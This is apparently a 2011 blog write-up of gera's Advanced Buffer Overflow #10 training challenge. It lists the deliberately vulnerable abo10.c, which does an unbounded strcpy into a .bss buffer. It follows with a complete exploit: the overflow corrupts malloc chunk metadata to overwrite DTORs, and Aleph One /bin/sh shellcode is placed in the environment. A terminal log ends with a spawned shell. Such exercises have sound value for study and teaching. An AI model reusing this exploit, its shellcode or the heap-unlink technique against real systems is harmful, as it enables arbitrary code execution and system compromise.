Monday, May 2, 2011

Advanced Buffer Overflow #10

/* abo10.c                                                   *
* specially crafted to feed your brain by gera@core-sdi.com */

/* Deja-vu                                                   */

/* 256-byte destination for the copy in main().  It is a file-scope array,
 * so it lives in .bss rather than on the stack; a longer-than-255-byte
 * argument runs off its end into whatever the loader placed after it. */
char buf[256];

/* NOTE: the parameter names are swapped relative to the usual convention:
 * `argv` is the argument count and `argc` is the argument vector.
 * As listed, no header is included, so malloc/strcpy/free are implicitly
 * declared (a warning under C99/C11, a hard error in newer compilers). */
int main(int argv,char **argc) {
       char *pbuf=(char*)malloc(256);   /* heap chunk; never written, only freed */

       //gets(buf);
       /* Defect: unbounded copy.  Nothing checks that an argument was given
        * (argc[1] is NULL when argv < 2) and nothing limits the length, so
        * any argument longer than 255 bytes overflows buf.  A corrected
        * version would test `argv >= 2` first and use a bounded copy such as
        * `snprintf(buf, sizeof buf, "%s", argc[1]);` (with <stdio.h>). */
       strcpy(buf, argc[1]);
       /* Per the write-up, the overflow above reaches malloc's bookkeeping;
        * this free() is where that corrupted metadata is consumed. */
       free(pbuf);
       /* No explicit return: under C99+ reaching the end of main() yields 0. */
}


As with abo9, I modified abo10 to use a strcpy().

buf lives in the .bss section, and the overflow runs from there into malloc's data structures, overwriting them.

Since there isn't much to work with, I'm overwriting DTORs to get code execution (see abo5).

This time around, I put the shellcode in env and am using murat's technique to reliably calculate the offset.

The rest is the same as abo9.

#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* nm -n abo10 | grep DTOR */
/* Build-specific: read from the author's own abo10 binary with the nm
 * command above.  A different build, toolchain or linker gives a
 * different value; nothing below verifies it. */
#define FUNCTION_POINTER ( 0x080495a8 )
/* murat's BUFFER OVERFLOWS DEMYSTIFIED shellcode in env technique */
/* Evaluated at runtime (two strlen() calls).  The 0xbffffffa constant is
 * the stack-top assumption for the author's 32-bit system; it is not
 * derived from the running process. */
#define CODE_ADDRESS ( 0xbffffffa - strlen(shellcode) - strlen(VULNERABLE))

/* Absolute path of the target on the author's machine; its length also
 * feeds CODE_ADDRESS above, so moving the binary changes the result. */
#define VULNERABLE "/home/dennis/abo10/abo10"
/* Values stored into the size-field slots of the payload in main(). */
#define NEGATIVE 0xfffffffc
#define JUNK 0xdefaced

/* Payload placed in the target's environment (the sole env[] entry in
 * main()).  The byte groups are as the inline comments label them. */
char shellcode[] =
       /* the jump instruction */
       "\xeb\x0appssssffff"
       /* the Aleph One shellcode */
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Assembles the string handed to VULNERABLE as argv[1], makes shellcode
 * the only environment entry, and execve()s the target.
 *
 * argv1 layout (272 + 1 bytes): 256 bytes of padding, then four 4-byte
 * fields in the order of the per-field comments below, then a NUL.
 *
 * Assumptions, none of which are checked at runtime:
 *   - a 32-bit little-endian target where sizeof(size_t) ==
 *     sizeof(void *) == 4 (every store is followed by `p += 4`);
 *   - FUNCTION_POINTER, CODE_ADDRESS and VULNERABLE match the author's
 *     build and environment (see the defines above).
 *
 * Returns -1 only if execve() fails; on success it does not return.
 */
int main(void)
{
       char *p;
       char argv1[272 + 1];
       char *argv[] = { VULNERABLE, argv1, NULL };
       char *env[] = { shellcode, NULL };   /* shellcode is the entire environment */

       p = argv1;   /* write cursor into the payload */

       /* fill the target's 256-byte buf with padding */
       memset(p, 'A', 256);
       p += 256;

       /* The stores below write 4-byte values through size_t * / void **
        * into a char array.  That relies on argv1 happening to be aligned
        * and on the compiler tolerating the aliasing (undefined under the
        * standard); it works on the author's build. */

       /* the prev_size field of the second chunk */
       *((size_t *)p) = (size_t)(NEGATIVE);
       p += 4;

       /* the size field of the second chunk */
       /* the prev_size field of fake chunk */
       *((size_t *)p) = (size_t)(NEGATIVE);
       p += 4;

       /* the size field of the fake chunk */
       *((size_t *)p) = (size_t)(JUNK);
       p += 4;

       /* the fd field of the fake chunk */
       *((void **)p) = (void *)(FUNCTION_POINTER - 12);
       p += 4;
       /* NOTE(review): %p expects a void *, but this argument is an int;
        * the mismatch is undefined behaviour even though it prints the
        * expected digits on a 32-bit system.  A (void *) cast fixes it. */
       printf("FUNCTION_POINTER - 12: %p\n", FUNCTION_POINTER - 12);

       /* the bk field of the fake chunk */
       *((void **)p) = (void *)(CODE_ADDRESS);
       p += 4;
       /* NOTE(review): same %p / non-pointer mismatch as above. */
       printf("CODE_ADDRESS: %p\n", CODE_ADDRESS);

       /* Terminate, so execve() sees argv1 as a 272-byte C string. */
       *p = '\0';

       execve(argv[0], argv, env);

       /* Reached only when execve() failed (e.g. VULNERABLE not found). */
       return -1;
}

[dennis@localhost abo10]$ ./abo10-exp
FUNCTION_POINTER - 12: 0x804959c
CODE_ADDRESS: 0xbfffffa9
sh-2.04$